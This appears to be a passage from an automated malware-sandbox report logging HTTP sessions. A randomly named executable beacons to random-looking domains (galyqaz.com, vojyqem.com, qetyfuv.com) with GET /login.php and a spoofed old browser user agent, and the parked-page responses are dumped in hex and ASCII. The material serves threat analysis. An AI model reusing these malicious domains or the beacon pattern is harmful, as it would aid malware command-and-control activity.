                                                                                                                                                                                                            46192.168.2.962370199.191.50.83806964C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.252578020 CET279OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com
                                                                                                                                                                                                            Cookie: vsid=910vr4788904590031611
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358485937 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:18 GMT
                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Data Raw: 61 39 37 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: a974<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358522892 CET1236INData Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f
                                                                                                                                                                                                            Data Ascii: f(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358541012 CET1236INData Raw: 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61 72 20 61 3d 22 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20
                                                                                                                                                                                                            Data Ascii: edLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.pus
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358550072 CET1236INData Raw: 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 68 61 73 68 2e 73 75 62 73 74 72
                                                                                                                                                                                                            Data Ascii: ="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.in
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358551979 CET1236INData Raw: 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 69 66 28 75 2e
                                                                                                                                                                                                            Data Ascii: rrentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358556986 CET994INData Raw: 69 6e 67 3e 30 29 7b 61 2e 73 72 63 3d 22 2f 2f 22 2b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 64 6e 2b 22 2f 64 65 6c 69 76 65 72 79 2f 65 6d 70 74 79 2e 68 74 6d 6c 22 7d 61 2e 6e 61 6d 65 3d 62 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74
                                                                                                                                                                                                            Data Ascii: ing>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none");a.setAttribute("tabindex","-1");document.body.appendChild(a)}else{window.setTimeout(wi
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358629942 CET1236INData Raw: 64 6f 77 2e 63 6d 70 5f 72 63 28 22 22 29 7d 2c 74 72 75 65 29 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 67 65 74 54 43 44 61 74 61 22 29 7b 5f 5f 63 6d 70 2e 61 2e 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d
                                                                                                                                                                                                            Data Ascii: dow.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.length==4&&a[3]===false){a[2]({},false)}else{__cmp.a.p
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358644962 CET1236INData Raw: 74 69 6f 6e 73 3a 5b 30 5d 2c 67 70 70 53 74 72 69 6e 67 3a 22 22 2c 70 69 6e 67 44 61 74 61 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 5f 70 69 6e 67 28 29 7d 7d 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 68 61 73 53 65 63 74 69 6f 6e 22 7c 7c 67
                                                                                                                                                                                                            Data Ascii: tions:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler=function(d){var a=typeof d.data==="string";try{var
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358655930 CET1236INData Raw: 22 29 7d 2c 22 70 61 72 61 6d 65 74 65 72 22 20 69 6e 20 62 3f 62 2e 70 61 72 61 6d 65 74 65 72 3a 6e 75 6c 6c 2c 22 76 65 72 73 69 6f 6e 22 20 69 6e 20 62 3f 62 2e 76 65 72 73 69 6f 6e 3a 31 29 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74
                                                                                                                                                                                                            Data Ascii: ")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(window[a])==="undefined"||window[a]!==null))){window[a
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.358722925 CET1236INData Raw: 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 67 70 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 47 70 70 53 74 75 62 28 22 5f 5f 67 70 70 22 29 7d 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d
                                                                                                                                                                                                            Data Ascii: w)||!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://galyqaz.com/px.js?ch=1"></script><script type="text/javascript" src="http://galyqaz
                                                                                                                                                                                                            Nov 11, 2024 18:08:20.364382029 CET1236INData Raw: 61 72 2e 65 6f 74 22 29 3b 73 72 63 3a 20 75 72 6c 28 22 68 74 74 70 3a 2f 2f 69 34 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6d 6f 6e 74 73 65 72 72 61 74 2d 72 65 67 75 6c 61 72 2f 6d 6f 6e 74
                                                                                                                                                                                                            Data Ascii: ar.eot");src: url("http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix") format("embedded-opentype"),url("http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff") format("woff"),


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            47192.168.2.962592199.59.243.227802936C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:21.744554996 CET305OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: vojyqem.com
                                                                                                                                                                                                            Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
                                                                                                                                                                                                            Nov 11, 2024 18:08:22.156033039 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            date: Mon, 11 Nov 2024 17:08:21 GMT
                                                                                                                                                                                                            content-type: text/html; charset=utf-8
                                                                                                                                                                                                            content-length: 1094
                                                                                                                                                                                                            x-request-id: 541c896b-249d-4ef8-959e-64ae357caaa8
                                                                                                                                                                                                            cache-control: no-store, max-age=0
                                                                                                                                                                                                            accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                            set-cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65; expires=Mon, 11 Nov 2024 17:23:22 GMT
                                                                                                                                                                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                            Nov 11, 2024 18:08:22.156461000 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                            Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTVhODhlYTAtMzZhNy00ZTRlLThmNjAtNWQxMTM5YjFkZjY1IiwicGFnZV90aW1lIjoxNzMxMzQ0OTAyLCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            48192.168.2.96259344.221.84.105802936C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:21.752516031 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: qetyfuv.com
                                                                                                                                                                                                            Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
                                                                                                                                                                                                            Nov 11, 2024 18:08:22.212192059 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:22 GMT
                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344902|1731344858|22|2|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            49192.168.2.962603199.191.50.83801812C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            Nov 11, 2024 18:08:25.152899981 CET279OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                            Referer: http://www.google.com
                                                                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                            Host: galyqaz.com
                                                                                                                                                                                                            Cookie: vsid=910vr4788904590031611
                                                                                                                                                                                                            Nov 11, 2024 18:08:27.791850090 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Mon, 11 Nov 2024 17:08:25 GMT
                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                            Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw==
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Data Raw: 61 39 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED]
                                                                                                                                                                                                            Data Ascii: a9c4<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
                                                                                                                                                                                                            Nov 11, 2024 18:08:27.791887045 CET1236INData Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f
                                                                                                                                                                                                            Data Ascii: f(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net
                                                                                                                                                                                                            Nov 11, 2024 18:08:27.791914940 CET1236INData Raw: 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61 72 20 61 3d 22 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20
                                                                                                                                                                                                            Data Ascii: edLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.pus
                                                                                                                                                                                                            Nov 11, 2024 18:08:27.791927099 CET1236INData Raw: 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 68 61 73 68 2e 73 75 62 73 74 72
                                                                                                                                                                                                            Data Ascii: ="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.in
                                                                                                                                                                                                            Nov 11, 2024 18:08:27.791939974 CET1236INData Raw: 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 69 66 28 75 2e
                                                                                                                                                                                                            Data Ascii: rrentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}
                                                                                                                                                                                                            Nov 11, 2024 18:08:27.791956902 CET1236INData Raw: 69 6e 67 3e 30 29 7b 61 2e 73 72 63 3d 22 2f 2f 22 2b 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 64 6e 2b 22 2f 64 65 6c 69 76 65 72 79 2f 65 6d 70 74 79 2e 68 74 6d 6c 22 7d 61 2e 6e 61 6d 65 3d 62 3b 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74
                                                                                                                                                                                                            Data Ascii: ing>0){a.src="//"+window.cmp_cdn+"/delivery/empty.html"}a.name=b;a.setAttribute("title","Intentionally hidden, please ignore");a.setAttribute("role","none");a.setAttribute("tabindex","-1");document.body.appendChild(a)}else{window.setTimeout(wi
                                                                                                                                                                                                            Nov 11, 2024 18:08:27.791970015 CET1236INData Raw: 70 75 73 68 28 5b 5d 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 29 29 7d 7d 7d 7d 7d 7d 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 70 70 5f 70 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 67 70 70 56 65 72 73 69 6f 6e 3a 22 31
                                                                                                                                                                                                            Data Ascii: push([].slice.apply(a))}}}}}}};window.cmp_gpp_ping=function(){return{gppVersion:"1.0",cmpStatus:"stub",cmpDisplayStatus:"hidden",supportedAPIs:["tcfca","usnat","usca","usva","usco","usut","usct"],cmpId:31}};window.cmp_gppstub=function(){var a=
                                                                                                                                                                                                            Nov 11, 2024 18:08:27.791981936 CET1236INData Raw: 20 63 3d 61 3f 4a 53 4f 4e 2e 70 61 72 73 65 28 64 2e 64 61 74 61 29 3a 64 2e 64 61 74 61 7d 63 61 74 63 68 28 66 29 7b 76 61 72 20 63 3d 6e 75 6c 6c 7d 69 66 28 74 79 70 65 6f 66 28 63 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 63 21 3d 3d 6e 75
                                                                                                                                                                                                            Data Ascii: c=a?JSON.parse(d.data):d.data}catch(f){var c=null}if(typeof(c)==="object"&&c!==null&&"__cmpCall" in c){var b=c.__cmpCall;window.__cmp(b.command,b.parameter,function(h,g){var e={__cmpReturn:{returnValue:h,success:g,callId:b.callId}};d.source.p
                                                                                                                                                                                                            Nov 11, 2024 18:08:27.791996956 CET1236INData Raw: 61 5d 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 75 62 3b 77 69 6e 64 6f 77 5b 61 5d 2e 6d 73 67 48 61 6e 64 6c 65 72 3d 77 69 6e 64 6f 77 2e 63 6d 70 5f 6d 73 67 68 61 6e 64 6c 65 72 3b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65
                                                                                                                                                                                                            Data Ascii: a]=window.cmp_stub;window[a].msgHandler=window.cmp_msghandler;window.addEventListener("message",window.cmp_msghandler,false)}};window.cmp_setGppStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&
